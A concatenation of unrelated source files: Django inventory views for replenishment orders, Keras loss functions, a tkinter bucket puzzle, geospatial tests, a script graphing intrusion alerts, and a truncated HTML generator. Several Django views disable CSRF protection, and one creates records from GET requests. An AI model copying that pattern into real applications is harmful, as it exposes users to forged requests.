            detalle.estado = Tipo.objects.filter(grupo="DETALLEPEDIDO", nombre="Recibido").first()
            detalle.orden = orden
            detalle.save()
            # Mark the pending-replenishment record (if any) as having its
            # detail saved, so the notification list reflects it.
            if ProductoReposicionPendiente.objects.filter(producto_id=pk_producto).exists() == True:
                prodRes = ProductoReposicionPendiente.objects.get(producto_id=pk_producto)
                prodRes.detalle_orden_guardada = True
                prodRes.save()
            mensaje = "ok"
        else:
            mensaje = "Todos los campos deben ser diligenciados."
    return JsonResponse({'mensaje':mensaje})
"""
SA-LCINV-16: Método que retorna la fecha de petición de la orden de
reposición almacenada por sesion.
"""
@csrf_exempt
def fechaPeticionOrdenReposicion(request):
    """SA-LCINV-16: return the request date of the session's pending order,
    formatted with strftime('%c')."""
    pk_orden = request.session.get('orden_pedido_id', None)
    if pk_orden != None:
        orden = OrdenPedido.objects.get(id=pk_orden)
        return JsonResponse({"fecha": orden.fecha_peticion.strftime('%c')})
    # The original returned None here (an HTTP 500 in Django); answer with
    # an explicit empty payload instead.
    return JsonResponse({"fecha": None})
"""
SA-LCINV-16: Método que guarda un registro en BD para tener
la notificación pendiente de orden de reposición.
"""
@csrf_exempt
def guardarNotificacionOrden(request):
    """SA-LCINV-16: persist the pending replenishment notification for a
    product (id taken from the querystring, else from the session)."""
    if request.method == 'GET' and 'id' in request.GET:
        return guardarDetalle(id=request.GET['id'])
    return guardarDetalle(id=request.session.get('producto_id', None))
"""
SA-LCINV-16: Método que retorna todos los productos pendientes de
reposición.
"""
@csrf_exempt
def obtenerProductosPendienteReposicion(request):
    """SA-LCINV-16: list every product awaiting replenishment, serialized
    through ProductoVista."""
    vistas = []
    for pendiente in ProductoReposicionPendiente.objects.all():
        p = Producto.objects.get(id=pendiente.producto_id)
        vista = ProductoVista()
        vista.id = p.id
        vista.codigo = p.codigo
        vista.nombre = p.nombre
        vista.descripcion = p.descripcion
        vista.valorUnitario = str(p.valorUnitario)
        vista.unidadesExistentes = str(p.unidadesExistentes)
        vista.clasificacion = p.get_clasificacion_display()
        vista.unidad_medida = p.unidad_medida.nombre
        vista.unidad_unitaria = str(p.unidad_unitaria)
        vista.imageFile = str(p.imageFile)
        vista.proveedor = p.proveedor.first_name
        nivel = views_nivel_insumos.nivel_insumo_tabla(p.id, p.punto_pedido)
        # NOTE(review): codigo_color is filled with the saved-detail flag,
        # not the computed color code — looks deliberate here, but verify
        # against the frontend's expectations.
        vista.codigo_color = str(pendiente.detalle_orden_guardada)
        vista.punto_pedido = str(p.punto_pedido)
        vista.nivel_actual = str(nivel[1])
        vistas.append(vista)
    return JsonResponse({'productos': json.dumps(vistas, cls=Convertidor)})
"""
SA-LCINV-16: Metodo que se encarga de crear el registro en la tabla
de productos pendientes de reposición.
"""
def guardarDetalle(id):
    """SA-LCINV-16: create the pending-replenishment record for a product,
    unless one already exists (or no id was supplied)."""
    if id is None or ProductoReposicionPendiente.objects.filter(producto_id=id).exists():
        return JsonResponse({'mensaje': 'YaExisteOrden'})
    registro = ProductoReposicionPendiente()
    registro.producto = Producto.objects.get(id=id)
    # Detail not yet saved; flipped by guardarDetalleOrdenReposicion.
    registro.detalle_orden_guardada = False
    registro.save()
    return JsonResponse({'mensaje': 'ok'})
"""
SA-LCINV-16: Método que crea la orden de reposición directamente
creando un registro en la BD tabla orden_pedido.
"""
def crearOrden(id):
    """SA-LCINV-16: persist a replenishment OrdenPedido for the product's
    provider and return it (None when no id is given)."""
    if id is None:
        return None
    producto = Producto.objects.get(id=id)
    orden_pedido = OrdenPedido(
        fecha_peticion=datetime.now(),
        estado=Tipo.objects.get(nombre="Ingresada"),
        # Any non-superuser, non-provider user acts as the creator.
        usuario_creacion=Usuario.objects.filter(is_superuser=False).exclude(roles__nombre='Proveedor').first(),
        proveedor=producto.proveedor,
        observaciones="Orden de Reposición por nivel mínimo generada automáticamente.",
    )
    orden_pedido.save()
    return orden_pedido
|
from segmentation_models.base import Loss
from segmentation_models.base import functional as F
import segmentation_models as sm
import keras.backend as K
import tensorflow as tf
class L1Loss(Loss):
    """Mean absolute error wrapped in the segmentation_models Loss API."""
    def __init__(self):
        super().__init__(name='l1')
    def __call__(self, gt, pr):
        # Delegates to the module-level l1(), injecting the framework backend.
        return l1(gt, pr, **self.submodules)
class L2Loss(Loss):
    """Mean squared error wrapped in the segmentation_models Loss API."""
    def __init__(self):
        super().__init__(name='l2')
    def __call__(self, gt, pr):
        # Delegates to the module-level l2(), injecting the framework backend.
        return l2(gt, pr, **self.submodules)
class TverskyLoss(Loss):
    """1 - Tversky index; alpha weighs false positives vs false negatives."""
    def __init__(self, alpha=0.5):
        super().__init__(name='tversky')
        # Penalty weight for false positives (1 - alpha penalizes FNs).
        self.alpha = alpha
    def __call__(self, gt, pr):
        return 1 - tversky(gt, pr, alpha=self.alpha, **self.submodules)
class TverskyFocalLoss(Loss):
    """Focal Tversky loss: (1 - tversky) ** gamma, emphasizing hard examples."""
    def __init__(self, alpha=0.5, gamma=2.0):
        super().__init__(name='tverskyfocal')
        # alpha: false-positive penalty weight; gamma: focal exponent.
        self.alpha = alpha
        self.gamma = gamma
    def __call__(self, gt, pr):
        tverloss = 1 - tversky(gt, pr, alpha=self.alpha, **self.submodules)
        return K.pow(tverloss, self.gamma)
class WeightedBinaryCE(Loss):
    """Class-weighted binary cross-entropy; alpha weighs the positive class."""
    def __init__(self, alpha=0.5):
        super().__init__(name='weightedBCE')
        self.alpha = alpha
    def __call__(self, gt, pr):
        return weightedBCE(gt, pr, alpha=self.alpha, **self.submodules)
class ComboLoss(Loss):
    """Weighted combination of a modified cross-entropy and (negative) F-score.

    alpha weighs the CE term against the F-score term; beta is passed
    through to modifiedCE.
    """
    def __init__(self, alpha=0.5, beta=0.5):
        super().__init__(name='combo')
        self.alpha = alpha
        self.beta = beta
    def __call__(self, gt, pr):
        # Bug fix: the original referenced the bare name `alpha`, which is
        # undefined at call time (NameError); use the stored self.alpha.
        return self.alpha * modifiedCE(gt, pr, beta=self.beta, **self.submodules) \
            - (1 - self.alpha) * F.fscore(gt, pr, **self.submodules)
class SimpleSSLoss(Loss):
    """Sensitivity-specificity loss: 1 minus a weighted mean of the two rates."""
    def __init__(self, alpha=0.5):
        super().__init__(name='simplessl')
        # alpha weighs sensitivity; (1 - alpha) weighs specificity.
        self.alpha = alpha
    def __call__(self, gt, pr):
        return 1 - 0.5 * (self.alpha * sensitivity(gt, pr, **self.submodules) + (1-self.alpha) * specificity(gt, pr, **self.submodules))
def l1(gt, pr, **kwargs):
    """Mean absolute error between ground truth and prediction.

    The keras-style backend module is injected via kwargs['backend'].
    """
    be = kwargs['backend']
    return be.mean(be.abs(gt - pr))
def l2(gt, pr, **kwargs):
    """Mean squared error between ground truth and prediction.

    The keras-style backend module is injected via kwargs['backend'].
    """
    be = kwargs['backend']
    return be.mean(be.square(gt - pr))
def tversky(gt, pr, alpha=0.5, **kwargs):
    """Tversky index, a generalization of the Dice/IoU scores.

    alpha penalizes false positives and (1 - alpha) false negatives; a
    small smoothing constant keeps the ratio defined for empty masks.
    """
    be = kwargs['backend']
    fp_weight = alpha
    fn_weight = 1 - alpha
    smooth = 1e-6
    tp = be.sum(gt * pr)
    fp = be.sum((1 - gt) * pr)
    fn = be.sum(gt * (1 - pr))
    return (tp + smooth) / (tp + fp_weight * fp + fn_weight * fn + smooth)
def weightedBCE(gt, pr, alpha=0.5, **kwargs):
    """Class-weighted binary cross-entropy (summed, not averaged).

    alpha weighs the positive class and (1 - alpha) the negative class;
    smooth keeps the logarithms finite at pr == 0 or pr == 1.
    """
    backend = kwargs['backend']
    smooth = 1e-6
    # Consistency fix: use the injected backend's sum like every other loss
    # in this module instead of hard-wiring tensorflow's tf.reduce_sum
    # (the two are equivalent for keras-backend tensors).
    return -backend.sum(alpha*gt*backend.log(pr+smooth) + (1-alpha)*(1-gt)*backend.log(1-pr+smooth))
def modifiedCE(gt, pr, beta=0.5, **kwargs):
    """Beta-weighted binary cross-entropy (summed, not averaged).

    Bug fixes vs the original: keras backends expose `sum`, not
    `reduce_sum` (the old call raised AttributeError); the positive-class
    term read `gt - log(pr)` instead of the cross-entropy `gt * log(pr)`
    used by the sibling weightedBCE; and the declared smoothing constant
    was never applied, so pr values of exactly 0 or 1 produced infinities.
    """
    backend = kwargs['backend']
    smooth = 1e-6
    return -backend.sum(beta*gt*backend.log(pr+smooth) + (1-beta)*(1-gt)*backend.log(1-pr+smooth))
def sensitivity(gt, pr, **kwargs):
    """True-positive rate tp / (tp + fn), smoothed like tversky().

    The original declared `smooth` but never used it, so an all-negative
    ground truth divided by zero; the smoothing term (applied to both
    numerator and denominator, matching tversky) makes the empty case
    return 1. Unused tn/fp accumulations were dropped.
    """
    backend = kwargs['backend']
    smooth = 1e-6
    tp = backend.sum(gt * pr)
    fn = backend.sum(gt * (1-pr))
    return (tp + smooth) / (tp + fn + smooth)
def specificity(gt, pr, **kwargs):
    """True-negative rate tn / (fp + tn), smoothed like tversky().

    The original declared `smooth` but never used it, so an all-positive
    ground truth divided by zero; the smoothing term makes the empty case
    return 1. Unused tp/fn accumulations were dropped.
    """
    backend = kwargs['backend']
    smooth = 1e-6
    tn = backend.sum((1-gt) * (1-pr))
    fp = backend.sum((1-gt) * pr)
    return (tn + smooth) / (fp + tn + smooth)
from tkinter import *
from functools import partial
import Mainwindow
import class_gallons
class SeauWindow:
    """Main window of the bucket (seau) pouring puzzle.

    Each bucket is drawn as a button; clicking a first bucket selects the
    pour source and clicking a second one pours into it. The game is won
    when any bucket holds exactly the target amount (`final`).
    """
    def __init__(self, nbrSeau, tailles, final, initial):
        # Current content of each bucket, in units.
        self._contenu = []
        # True while waiting for the first (source) bucket click.
        self._first = True
        # Index of the currently selected source bucket (-1 = none).
        self._select = -1
        # Capacity of each bucket.
        self._tailles = tailles
        self.Seau_w = ""
        # Target amount to reach in any one bucket.
        self._final = final
        # Initial fill flags (0 empty / 1 full) per bucket.
        self._initial = initial
        self.nbrSeau = nbrSeau
        # One StringVar per bucket for the "content/capacity" labels.
        self.update_list=[]
        self.pop =""
        # Window width scales with the number of buckets.
        self.size_w = str(240*nbrSeau) + 'x350'
        # Number of pours performed so far.
        self.coup = 0
        for i in range(0, nbrSeau):
            self._contenu.append(initial[i] * tailles[i])
        self.launch()
    def launch(self):
        """Build the game window (one button + label per bucket) and run
        the Tk main loop."""
        self.Seau_w = Tk()
        self.Seau_w.title('Jeu des Seaux')
        self.Seau_w.geometry(self.size_w)
        self.center(self.Seau_w)
        photo = PhotoImage(file='img/seau.gif')
        for i in range(1, self.nbrSeau + 1):
            self.Seau_w.columnconfigure(i, weight=1)
            Button(image=photo, command=partial(self.vide, i - 1)).grid(row=0, column=i)
        self.Seau_w.rowconfigure(0, weight=1)
        self.Seau_w.rowconfigure(1, weight=1)
        self.Seau_w.rowconfigure(2, weight=1)
        for i in range(0, self.nbrSeau):
            self.update_list.append(StringVar())
            labelfont = ('comic', 28, 'bold')
            lab = Label(textvariable=self.update_list[i], relief=RAISED, )
            lab.config(font=labelfont)
            lab.grid(row=1, column=i + 1)
            self.update_list[i].set(str(self._contenu[i]) + "/" + str(self._tailles[i]))
        button_retour = Button(text="Retour", command=self.retour_button)
        button_retour.grid(row=2, column=self.nbrSeau)
        self.Seau_w.mainloop()
        return
    def retour_button(self):
        """Close the game window and return to the main menu."""
        self.Seau_w.destroy()
        self._contenu = []
        Mainwindow.mainwindow()
        return
    def retour_pop(self):
        """Close the victory popup, then the game window."""
        self.pop.destroy()
        self.retour_button()
        return
    def center(self, toplevel):
        """Center a toplevel window on the screen."""
        toplevel.update_idletasks()
        # Tkinter way to find the screen resolution
        screen_width = toplevel.winfo_screenwidth()
        screen_height = toplevel.winfo_screenheight()
        size = tuple(int(_) for _ in toplevel.geometry().split('+')[0].split('x'))
        x = screen_width / 2 - size[0] / 2
        y = screen_height / 2 - size[1] / 2
        toplevel.geometry("+%d+%d" % (x, y))
        return
    def vide(self, indice):
        """Handle a bucket click: first click selects the pour source,
        second click pours from the source into the clicked bucket
        (capped at its capacity), refreshes the labels, and checks for a win."""
        if self._first:
            self._select = indice
            self._first = False
        else:
            if indice != self._select:
                self.coup = self.coup+1
                # Free space remaining in the destination after the pour.
                reste = self._tailles[indice] - (self._contenu[indice] + self._contenu[self._select])
                if reste >= 0:
                    # Everything fits: the source empties completely.
                    self._contenu[indice] = self._contenu[indice] + self._contenu[self._select]
                    self._contenu[self._select] = 0
                else:
                    # Destination overflows: fill it and keep the excess in the source.
                    self._contenu[indice] = self._tailles[indice]
                    self._contenu[self._select] = -reste
            self._first = True
            for i in range(0, self.nbrSeau):
                self.update_list[i].set(str(self._contenu[i]) + "/" + str(self._tailles[i]))
            self.test()
        return
    def test(self):
        """Open the victory popup if any bucket holds exactly the target."""
        for i in range (0,self.nbrSeau):
            if self._contenu[i] == self._final:
                # Launch the victory popup with the number of moves taken.
                self.pop = Tk()
                self.pop.title('Jeu des Seaux')
                self.pop.geometry('350x350')
                self.center(self.pop)
                self.pop.columnconfigure(0, weight=1)
                self.pop.rowconfigure(0, weight=1)
                self.pop.rowconfigure(1, weight=2)
                Label(self.pop, text="Vous avez gagné en " +str(self.coup)+" félicitation").grid(row=0, column=0)
                Button(self.pop, text="Exit", command=self.retour_pop).grid(row=1, column=0)
        return
class parametreSeau:
    """Parameter dialog for the bucket game: collects bucket count, sizes,
    target amount and initial fill, validates solvability with the
    class_gallons model, then starts SeauWindow."""

    def __init__(self):
        # __init__ and launch() previously contained two byte-identical
        # copies of the widget-building code; both now share _build_window().
        self._build_window()

    def launch(self):
        """Rebuild and show the parameter window."""
        self._build_window()

    def _build_window(self):
        # Create the Tk window, the default parameter values and all widgets.
        self.parametre = Tk()
        self.parametre.title('Jeu des Seaux')
        self.parametre.geometry('700x350')
        self.center(self.parametre)
        self.pop = ""
        self.parametre.columnconfigure(0, weight=1)
        self.parametre.columnconfigure(1, weight=1)
        for row in range(5):
            self.parametre.rowconfigure(row, weight=1)
        # Defaults; overwritten from the entry fields on validation.
        self.nbrSeau = 5
        self.tailles = [1, 2, 3, 4, 5]
        self.final = 4
        self.initial = [1, 1, 1, 1, 0]
        button_retour = Button(text="Valider", command=self.check_button, width=10)
        button_retour.grid(row=4, column=1)
        Label(text="Nombre de seau :").grid(row=0, column=0)
        Label(text="Tailles des seau (exemple pour 5 seau : 1;2;3;5;8) :").grid(row=1, column=0)
        Label(text="But a atteindre :").grid(row=2, column=0)
        Label(text="Remplissage initial (0 pour vide et 1 pour plein) :").grid(row=3, column=0)
        self.entry_nbrS = StringVar()
        Entry(textvariable=self.entry_nbrS, width=40).grid(row=0, column=1)
        self.entry_nbrS.set("5")
        self.entry_tailles = StringVar()
        Entry(textvariable=self.entry_tailles, width=40).grid(row=1, column=1)
        self.entry_tailles.set("1;2;3;5;8")
        self.entry_final = StringVar()
        Entry(textvariable=self.entry_final, width=40).grid(row=2, column=1)
        self.entry_final.set("4")
        self.entry_initial = StringVar()
        Entry(textvariable=self.entry_initial, width=40).grid(row=3, column=1)
        self.entry_initial.set("1;1;1;1;0")
        return

    def check_button(self):
        """Read the entry fields, validate solvability, then either start
        the game window or show a 'no solution' popup."""
        self.nbrSeau = int(self.entry_nbrS.get())
        self.tailles = [int(part) for part in self.entry_tailles.get().split(";")]
        self.final = int(self.entry_final.get())
        self.initial = [int(part) for part in self.entry_initial.get().split(";")]
        if self.check():
            self.parametre.destroy()
            SeauWindow(self.nbrSeau, self.tailles, self.final, self.initial)
        else:
            # Popup informing the user the configuration has no solution.
            self.pop = Tk()
            self.pop.title('Erreur')
            self.pop.geometry('350x350')
            self.center(self.pop)
            self.pop.columnconfigure(0, weight=1)
            self.pop.rowconfigure(0, weight=1)
            self.pop.rowconfigure(1, weight=2)
            Label(self.pop, text="Pas de solution").grid(row=0, column=0)
            Button(self.pop, text="exit", command=self.pop.destroy).grid(row=1, column=0)
        return

    def center(self, toplevel):
        """Center a toplevel window on the screen."""
        toplevel.update_idletasks()
        # Tkinter way to find the screen resolution
        screen_width = toplevel.winfo_screenwidth()
        screen_height = toplevel.winfo_screenheight()
        size = tuple(int(_) for _ in toplevel.geometry().split('+')[0].split('x'))
        x = screen_width / 2 - size[0] / 2
        y = screen_height / 2 - size[1] / 2
        toplevel.geometry("+%d+%d" % (x, y))
        return

    def check(self):
        """Model the configuration with class_gallons and return whether
        the target amount is reachable."""
        list_gallon = []
        for i in range(1, self.nbrSeau + 1):
            list_gallon.append(
                class_gallons.Gallon(numero=i,
                                     taille=self.tailles[i - 1],
                                     remplissage_inital=self.tailles[i - 1] * self.initial[i - 1])
            )
        model = class_gallons.Modelisation_Gallon(quantite_objectif=self.final, liste_gallons=list_gallon)
        return model.solve()
|
import shapely
import pandas as pd
from shapely.geometry import Point, GeometryCollection
import pytest
from h3ronpy.pandas import change_resolution
from h3ronpy.pandas.vector import (
cells_to_points,
cells_to_polygons,
cells_dataframe_to_geodataframe,
geodataframe_to_cells,
geoseries_to_cells,
)
from h3ronpy import DEFAULT_CELL_COLUMN_NAME
import geopandas as gpd
from .. import load_africa
def test_cells_to_points():
    """Converting cells yields a GeoSeries of Point geometries."""
    series = cells_to_points([0x8009FFFFFFFFFFF])
    assert isinstance(series, gpd.GeoSeries)
    assert series.geom_type[0] == "Point"
def test_cells_to_polygons():
    """Each res-3 child cell becomes one polygon; link_cells merges them into one."""
    cells = change_resolution([0x8009FFFFFFFFFFF], 3)
    separate = cells_to_polygons(cells)
    assert isinstance(separate, gpd.GeoSeries)
    assert separate.geom_type[0] == "Polygon"
    assert len(separate) == 286
    merged = cells_to_polygons(cells, link_cells=True)
    assert isinstance(merged, gpd.GeoSeries)
    assert merged.geom_type[0] == "Polygon"
    assert len(merged) == 1
    assert shapely.get_num_coordinates(merged[0]) > 120
def test_cells_dataframe_to_geodataframe():
    """Conversion keeps all columns/rows and adds a Polygon geometry."""
    source = pd.DataFrame(
        {
            DEFAULT_CELL_COLUMN_NAME: [0x8009FFFFFFFFFFF],
            "id": [5],
        }
    )
    result = cells_dataframe_to_geodataframe(source)
    assert isinstance(result, gpd.GeoDataFrame)
    assert len(result) == len(source)
    assert (result[DEFAULT_CELL_COLUMN_NAME] == source[DEFAULT_CELL_COLUMN_NAME]).all()
    assert (result["id"] == source["id"]).all()
    assert result.geometry.geom_type[0] == "Polygon"
def test_cells_dataframe_to_geodataframe_empty():
    """Regression test for https://github.com/nmandery/h3ron/issues/17 —
    an empty input frame must convert without raising ValueError."""
    empty = pd.DataFrame({DEFAULT_CELL_COLUMN_NAME: []})
    converted = cells_dataframe_to_geodataframe(empty)
    assert converted.empty
def test_cells_geodataframe_to_cells():
    """Covering polygons at res 4 yields more cells than input rows, as uint64."""
    africa = load_africa()
    cells_df = geodataframe_to_cells(africa, 4)
    assert len(cells_df) > len(africa)
    assert cells_df.dtypes[DEFAULT_CELL_COLUMN_NAME] == "uint64"
def test_geoseries_to_cells_flatten():
    """flatten=True returns one flat uint64 array covering all geometries."""
    africa = load_africa()
    flattened = geoseries_to_cells(africa.geometry, 4, flatten=True)
    assert len(flattened) >= len(africa)
    assert flattened.dtype == "uint64"
def test_empty_geometrycollection_omitted():
    """An empty GeometryCollection contributes no cells at all."""
    frame = gpd.GeoDataFrame(
        {"geometry": [GeometryCollection()]},
        crs="epsg:4326",
    )
    assert len(geodataframe_to_cells(frame, 4)) == 0
def test_fail_on_empty_point():
    """An empty Point cannot be converted and must raise ValueError."""
    frame = gpd.GeoDataFrame(
        {"geometry": [Point()]},
        crs="epsg:4326",
    )
    with pytest.raises(ValueError):
        geodataframe_to_cells(frame, 4)
|
import string
import random
import sys
import time
import re
import pdb
def DrawIPFile(inputfile):
    """Split a tab-separated alert dump into one Graphviz .dot file per
    destination IP and return the list of file names written.

    NOTE(review): Python 2 only — relies on str.decode('string_escape'),
    string.join() and a `print` statement; it will not run under Python 3.

    Assumed input line layout (tab-separated) — confirm against producer:
        "dip,sip"\t"time,name -> time,name -> ..."
    """
    # ---- pass 1: bucket the raw input lines by destination IP ----
    dipfile = {}
    with open(inputfile) as res:
        for line in res:
            templine=line.decode('string_escape').strip("\"").strip()
            line_split=line.split('\t')#line_split[0]=dip_sip,line_split[1]=the attack fr
            dipsip=line_split[0].strip("\"")
            div_dipsip=dipsip.split(",")#div_dipsip[0]=dip,div_dipsip[1]=sip
            dip=div_dipsip[0].strip("\"")
            if dipfile.get(dip) is not None:
                dipfile.get(dip).append(templine)
            else:
                node_list = []
                node_list.append(templine)
                dipfile[dip] = node_list
    # ---- pass 2: write one digraph file (named after the IP) per destination ----
    file_list=[]
    for (k,v) in dipfile.items():
        file_list.append(k)
        with open(k, 'wb') as file:
            # drop duplicate alert lines for this destination
            res = list(set(v))
            att_content=[]
            usedRandomList=[]
            # one background color per source subgraph, cycled modulo 7
            color_list=['olivedrab2','orange2','orangered2','orchid2','palegreen1','paleturquoise1','palevioletred1']
            i=0
            for alert in res:
                # each alert line becomes its own colored cluster subgraph
                temp_alert=alert.decode('string_escape').strip("\"").strip("[").strip("]").strip()
                temp_div_alert=temp_alert.split("\t")#temp_div_alert[0]=dipsip,temp_div_alert[1]=the attack from sip to dip
                div_alert=str(temp_div_alert[0])
                dip_sip=div_alert.decode('string_escape').strip("\"").strip("[").strip("]").split(',')#dip_sip[0]=dip,
                temp_sip=dip_sip[1].decode('string_escape').strip("\"").strip("\'").strip()
                sip=temp_sip.decode('string_escape').strip("\"")
                label_value="label="+"\""+sip+"\""+";"
                random_color=color_list[(i%7)]
                i=i+1
                subgraph_color="color="+random_color+";"
                # random suffix keeps Graphviz cluster names unique in the file
                random_char=string.join(random.sample(['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o'], 7)).replace(" ","")
                random_num=random.randint(0,10000000)
                subgraph_name="subgraph"+" "+"cluster"+random_char+str(random_num)
                subgraph_style="style"+"="+"filled"+";"
                subgraph_node="node [style=filled,shape=plaintext];"
                attack=temp_div_alert[1].strip().strip("\"").split('->')
                ranksame=[]
                direction=[]
                att_time=[]
                label_list=[]
                time_label=[]
                time_name=[]
                timelabeldict={}
                finalranksame = []
                for each_attack in attack:
                    # each hop: "time,name"; build a unique synthetic node id
                    div_each_attack=each_attack.split(',')
                    random_char1=string.join(random.sample(['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o'], 5)).replace(" ","")
                    random_num1=random.randint(0,1000)
                    # regenerate until unused; the colliding value is also
                    # recorded, which bloats usedRandomList but stays correct
                    while random_char1 in usedRandomList:
                        usedRandomList.append(random_char1)
                        random_char1 = string.join(random.sample(['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o'], 5)).replace(" ","")
                    while random_num1 in usedRandomList:
                        usedRandomList.append(random_num1)
                        random_num1 = random.randint(0,1000)
                    time_mark=time.time()
                    att_name='%s'%(div_each_attack[1])+str(time_mark)+random_char1+str(random_num1)
                    usedRandomList.append(random_char1)
                    usedRandomList.append(random_num1)
                    # node label drops the first 15 chars — presumably a fixed-width
                    # timestamp prefix; TODO confirm against the input format
                    att_label="\""+att_name+"\""+"["+"label"+"="+"\""+each_attack[15:]+"\""+"]"
                    label_list.append(att_label)
                    att_time.append(div_each_attack[0])
                    att_direction="\""+att_name+"\""+"->"+"\""+k+"\""+"\n"
                    direction.append(att_direction)
                    one_rank="{rank=same;"+"\""+'%s'%(div_each_attack[0])+"\""+";"+"\""+att_name+"\""+";"+"}"+"\n"
                    ranksame.append(one_rank)
                final_direction='\n'.join(direction)
                # ordered timeline of the distinct timestamps seen above
                rev_time=list(set(att_time))
                sorted_time=sorted(rev_time)
                for each_time in sorted_time:
                    random_char3=string.join(random.sample(['p','q','r','s','t','u','v','w','x','y','z'], 5)).replace(" ","")
                    random_num3=random.randint(1000,10000)
                    random_time_name=random_char3+str(random_num3)
                    one_time_label=random_time_name+"["+"label"+"="+"\""+each_time+"\""+"]"
                    timelabeldict[each_time] = random_time_name
                    time_label.append(one_time_label)
                    time_name.append(random_time_name)
                temptimeorder="->".join(time_name) #different time is connected by ->
                timeorder=temptimeorder+";\n"
                # swap literal "MM/DD-HH:MM:SS" timestamps in the rank constraints
                # for the synthetic timeline node names generated above
                for r in ranksame:
                    regex = r"\"\d{2}/\d{2}-\d{2}:\d{2}:\d{2}\""
                    rersult = re.search(regex, r).group(0)
                    striptime = rersult.strip("\"")
                    result,number = re.subn(regex, timelabeldict[striptime], r)
                    print r, result
                    finalranksame.append(result)
                rank="".join(list(finalranksame))
                label="\n".join(label_list)
                all_time_label="\n".join(time_label)
                one_att_content=subgraph_name+"{"+"\n"+subgraph_node+"\n"+subgraph_style+"\n"+subgraph_color+"\n"+timeorder+all_time_label+"\n"+label+"\n"+rank+final_direction+label_value+"\n"+"}"
                att_content.append(one_att_content)
            final_content="\n".join(att_content)
            # one red ellipse cluster for the destination IP itself
            random_char2=string.join(random.sample(['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o'], 7)).replace(" ","")
            random_num2=random.randint(0,1000)
            dip_subgraph_name=random_char2+str(random_num2)
            dip_subgraph_content="subgraph"+" "+"cluster"+dip_subgraph_name+"{"+"\n"+"node [color=red,shape=ellipse];"+"\n"+"\""+k+"\""+";"+"\n"+"}"
            filestring = """digraph G {\n%s\n%s\n}""" % (dip_subgraph_content,final_content)
            file.write(filestring)
    return file_list
from typing import List
from trainer_v2.keras_server.name_short_cuts import NLIPredictorSig
def get_em_base_nli() -> NLIPredictorSig:
    """Build a trivial exact-match NLI predictor.

    The returned callable maps a list of (premise, hypothesis) string
    pairs to one-hot scores: [1, 0, 0] when every whitespace token of the
    lowercased hypothesis also occurs in the premise (entailment),
    otherwise [0, 1, 0].
    """
    def _tokens(chunk: str) -> set:
        # lowercase + whitespace split is the only normalization applied
        return set(chunk.lower().split())

    def em_based_nli(t1: str, t2: str) -> List[float]:
        # Set containment replaces the original full scan of tokens2 —
        # O(len(t1) + len(t2)) instead of O(len(t1) * len(t2)), with the
        # same result (presence only; multiplicity never mattered).
        entail = _tokens(t2) <= _tokens(t1)
        return [1, 0, 0] if entail else [0, 1, 0]

    def func(pair_items) -> List[List[float]]:
        return [em_based_nli(t1, t2) for t1, t2 in pair_items]

    return func
|
# BaekJoon18870.py — coordinate compression
import sys


def compress(values):
    """Map each value to its rank: the count of distinct smaller values."""
    rank = {v: i for i, v in enumerate(sorted(set(values)))}
    return [rank[v] for v in values]


if __name__ == '__main__':
    data = sys.stdin.read().split()
    # data[0] is N; the list length is implicit in the remaining tokens.
    arr = list(map(int, data[1:]))
    # One joined write instead of N prints with end=" " — per-element
    # print() is the classic time-limit-exceeded cause on this problem.
    sys.stdout.write(' '.join(map(str, compress(arr))) + '\n')
#!/usr/bin/env python3
"""
This file generates a single html page. When run multiple times, is can
generate all html files. When no input csv in defined, input is read from
stdin. When no output file is defined, output is written to stdout.
Usage:
soc_generator.py -o output_filename -t socs_topics_filename
-g socs_garants_filename template_dir -s state1,state2,...
-m path-to-root-template
"""
import soc_parser as parser
import os
import sys
import datetime
import logging
TEMPLATE_DIR = 'templates/soc'
TEMPLATE_TOPIC = 'topic.html'
TEMPLATE_INDEX = 'index.html'
TEMPLATE_NAVBAR = 'navbar.html'
TEMPLATE_GARANT = 'garant.html'
IMAGE_DIR = os.path.join('static', 'soc-icon')
class ArgOpts(object):
    """Container for the command-line options of soc_generator.

    Attributes: topics (list of topic CSV paths), ofn (output file name),
    garants (garant CSV path), states (topic states to include),
    template (path to the root index template).
    """
    def __init__(self, topics=None, ofn=None, garants=None, states=None,
                 template=os.path.join(TEMPLATE_DIR, TEMPLATE_INDEX)):
        self.topics = topics
        self.ofn = ofn
        self.garants = garants
        # default to an empty state filter rather than a shared mutable default
        self.states = [] if states is None else states
        self.template = template
def parse_args(argv):
    """Parse command-line flags into an ArgOpts instance.

    Recognized flags (each takes one value): -t topics, -o output,
    -f field, -g garants, -s states, -m root template. Unknown tokens
    are skipped.
    """
    opts = ArgOpts(states=['volno', 'obsazeno'])  # defaults
    idx = 0
    while idx < len(argv):
        flag = argv[idx]
        has_value = idx < len(argv) - 1
        if flag == '-t' and has_value:
            opts.topics = argv[idx + 1].split(',')
            idx += 1
        elif flag == '-o' and has_value:
            opts.ofn = argv[idx + 1]
            idx += 1
        elif flag == '-f' and has_value:
            # NOTE(review): `field` is not declared on ArgOpts and -f is
            # not mentioned in the module usage text — confirm it is used.
            opts.field = argv[idx + 1]
            idx += 1
        elif flag == '-g' and has_value:
            opts.garants = argv[idx + 1]
            idx += 1
        elif flag == '-s' and has_value:
            opts.states = argv[idx + 1].split(',')
            idx += 1
        elif flag == '-m' and has_value:
            opts.template = argv[idx + 1]
            idx += 1
        idx += 1
    return opts
###############################################################################
def generate_soc(template, topic):
    """Fill one topic template with the topic's data and return the HTML.

    Occupied/finished topics get a suffix appended to their name; the
    optional {{field-icons}} placeholder is expanded to one image per
    field whose SVG icon exists (missing icons are logged).
    """
    display_name = topic.name
    if topic.state == 'obsazeno':
        display_name = display_name + ' (obsazeno)'
    elif topic.state == 'ukončeno':
        display_name = display_name + ' (ukončeno)'
    substitutions = [
        ('{{state}}', 'soc-state-' + topic.state),
        ('{{id}}', topic.id),
        ('{{name}}', display_name),
        ('{{garant}}', topic.garant),
        ('{{head}}', topic.head),
        ('{{contact}}', topic.contact),
        ('{{annotation}}', topic.annotation.replace('\n', '</p><p>')),
    ]
    for placeholder, value in substitutions:
        template = template.replace(placeholder, value)
    if '{{field-icons}}' in template:
        icons = ''
        for field in topic.fields:
            svg_path = os.path.join(IMAGE_DIR, '%s.svg' % (field))
            if os.path.isfile(svg_path):
                icons += ('<div class="soc-field-image"><img src="/static/'
                          'soc-icon/%s.svg" alt="%s" title="%s"/></div>' %
                          (field, field, field))
            else:
                logging.warning('Missing file %s for SOC %s' %
